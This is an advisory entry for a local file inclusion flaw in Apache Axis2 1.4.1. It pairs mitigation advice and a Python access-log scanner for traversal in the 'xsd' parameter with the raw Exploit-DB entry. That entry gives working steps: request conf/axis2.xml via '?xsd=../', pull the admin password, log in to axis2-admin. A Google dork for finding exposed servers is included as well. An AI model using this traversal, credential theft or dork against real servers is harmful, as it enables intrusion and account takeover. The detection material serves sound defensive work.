Vendor: Axis2
By: HC
CVSS: 7.5 (HIGH)
Vulnerability: Local File Inclusion
CWE: 98
Product Name: Axis2
Affected Version From: Axis2 1.4.1
Affected Version To: Axis2 1.4.1
Patch Exists: NO
Related CWE: N/A
CPE: a:apache:axis2:1.4.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2010

Apache Axis2(1.4.1) Local File Inclusion Vulnerability

Apache Axis2 1.4.1 is vulnerable to local file inclusion. An attacker can exploit it by sending the vulnerable server an HTTP request with a specially crafted URL parameter (the "xsd" parameter in the proof of concept below). The parameter can be used to include a file from the server's local file system, which can then be used to gain access to the server's resources or to execute arbitrary code on the server.

Mitigation:

To mitigate this vulnerability, users should ensure that the web server is configured to only serve files from the intended directory. Additionally, users should ensure that the web server is configured to only serve files with the intended file extensions.
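
To check whether this request pattern has reached a server, the following Python code (an added example, not part of the original advisory or the Exploit-DB entry) scans access-log lines for requests to /axis2/services/ whose "xsd" parameter contains a parent-directory segment, including percent-encoded and double-encoded forms. It assumes Common/Combined Log Format; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Client address, request target and status from a Common/Combined Log Format line.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
SERVICE_RE = re.compile(r'/axis2/services/(?P<service>[^/?]+)', re.IGNORECASE)

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded '../' is also seen."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_traversal(xsd_value):
    """True if the value is absolute or contains a '..' path segment."""
    path = fully_decode(xsd_value).replace("\\", "/")
    return path.startswith("/") or ".." in path.split("/")

def find_xsd_traversal(log_lines):
    """Return one finding per request whose xsd parameter leaves the service."""
    findings = []
    for line in log_lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        svc = SERVICE_RE.search(url.path)
        if not svc:
            continue
        for name, values in parse_qs(url.query, keep_blank_values=True).items():
            if name.lower() != "xsd":  # match the name case-insensitively
                continue
            findings += [{"ip": m["ip"], "service": svc["service"],
                          "xsd": fully_decode(v), "status": int(m["status"])}
                         for v in values if is_traversal(v)]
    return findings

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [24/May/2010:10:00:01 +0000] "GET /axis2/services/Version?xsd=../conf/axis2.xml HTTP/1.1" 200 5120',
    '192.0.2.11 - - [24/May/2010:10:00:05 +0000] "GET /axis2/services/Version?xsd=xsd0 HTTP/1.1" 200 812',
    '198.51.100.7 - - [24/May/2010:10:01:12 +0000] "GET /axis2/services/Version?xsd=%252e%252e%252fconf%252faxis2.xml HTTP/1.1" 200 5120',
    '192.0.2.11 - - [24/May/2010:10:02:00 +0000] "GET /axis2/services/Version?wsdl HTTP/1.1" 200 2048',
]
```

A finding with status 200 means the server answered the request, so the credentials in conf/axis2.xml should be treated as exposed and changed.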

Exploit-DB raw data:

# Exploit Title: Apache Axis2(1.4.1) Local File Inclusion Vulnerability
# Date: 2010/5/24
# Author: HC
# Software Link: http://ws.apache.org/axis2/download/1_4_1/download.cgi
# Version: Axis2 1.4.1
# Tested on: Linux
# category: Webapps
# Code :

1. http://Domain Name/axis2/services/xxxxxxx?xsd=../conf/axis2.xml
(ex: http://Domain Name/axis2/services/Version?xsd=../conf/axis2.xml)

2. search keyword "password". (Get username and password)


3. Login http://Domain Name/axis2/axis2-admin/


google: inurl:"axis2/services" "list Services"